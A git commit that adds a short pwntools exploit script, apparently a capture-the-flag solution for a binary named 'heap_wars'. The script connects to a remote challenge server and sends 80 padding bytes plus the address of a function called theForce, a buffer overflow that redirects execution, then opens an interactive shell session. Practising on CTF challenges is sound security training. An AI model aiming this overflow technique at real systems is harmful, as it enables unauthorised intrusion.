solve script

This commit is contained in:
jc
2024-11-18 19:49:43 +03:00
parent 3d7dffbaa3
commit 5191989368
+18
View File
@@ -0,0 +1,18 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./heap_wars", checksec=False)
# r = process()
r = remote("94.72.112.248", 1337)
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# buf
s(b"1")
buf = b"A"*80
buf += p64(target.sym.theForce)
s(buf)
r.interactive()